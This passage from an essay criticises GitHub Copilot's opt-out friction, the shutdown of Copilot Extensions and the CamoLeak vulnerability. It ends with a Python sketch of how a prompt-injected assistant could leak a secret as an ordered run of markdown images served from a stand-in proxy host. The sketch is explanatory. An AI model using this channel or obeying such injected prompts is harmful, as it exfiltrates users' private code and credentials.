
We see this most clearly in the friction around opting out. In 2025, Microsoft and GitHub strained developer trust by pushing Copilot deeper into core workflows without giving maintainers clean, reliable control over it. For example, two of the most upvoted GitHub Community threads of the prior twelve months were a request to block Copilot-generated issues and pull requests, and a request for a way to disable automatic Copilot code reviews.
Beyond this friction, GitHub has made ecosystem-level shifts that feel like rug pulls to integrators. In a move that shocked many, it announced a hard sunset for Copilot Extensions built as GitHub Apps: creation of new extensions was blocked after September 24, 2025, and existing ones were fully disabled by November 10, 2025. In pivoting to Model Context Protocol servers, GitHub explicitly told developers this was a replacement, not a migration, violating the cardinal rule of “boring” infrastructure: stability is supposed to be the feature, not API churn.
And just to round it out, Copilot’s security posture took a very public hit when researchers disclosed “CamoLeak,” a critical Copilot Chat vulnerability that could exfiltrate secrets and private code from private repositories via prompt injection and a CSP bypass (the encoding trick is sketched below). GitHub mitigated it in part by disabling image rendering in Copilot Chat.

Put those together and the trust problem is not that AI exists; it is the perception that Copilot is becoming unavoidable infrastructure while remaining subject to churn and occasional sharp edges, which are hard to justify when the product is supposed to be the boring, dependable layer.
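For the curious, here is a minimal sketch of the image-sequence encoding that public write-ups describe for CamoLeak. Everything in it is illustrative: the proxy domain, URL shapes, and alphabet mapping are hypothetical stand-ins rather than GitHub’s actual Camo scheme, and the point is only to show how rendering an ordered sequence of per-character images can leak data to whoever serves those images.

```python
# Illustrative sketch of a CamoLeak-style exfiltration encoding: the attacker
# pre-generates one proxied image URL per character, then coaxes the assistant
# into rendering those images in an order that spells out the secret. Every
# name and URL below is a hypothetical stand-in.

SECRET = "ghp_example_token"  # stands in for a leaked secret or code snippet

# One pre-generated, attacker-controlled image URL per character. In the real
# attack these would be valid signed proxy URLs prepared ahead of time.
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789_"
CHAR_TO_URL = {
    ch: f"https://proxy.example.com/img/{i:02d}.png"
    for i, ch in enumerate(ALPHABET)
}

def encode_as_markdown(secret: str) -> str:
    """Emit the secret as an ordered run of markdown images.

    Whoever serves the images reconstructs the secret from the request
    order in their access logs, one character per hit; the chat client
    never sends the secret anywhere directly, it just renders pictures.
    """
    return "".join(
        f"![]({CHAR_TO_URL[ch]})" for ch in secret.lower() if ch in CHAR_TO_URL
    )

if __name__ == "__main__":
    print(encode_as_markdown(SECRET))
```

This also explains why GitHub’s mitigation, disabling image rendering in Copilot Chat, works despite being blunt: it cuts the channel off at the rendering step rather than trying to sanitize the injected prompt.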

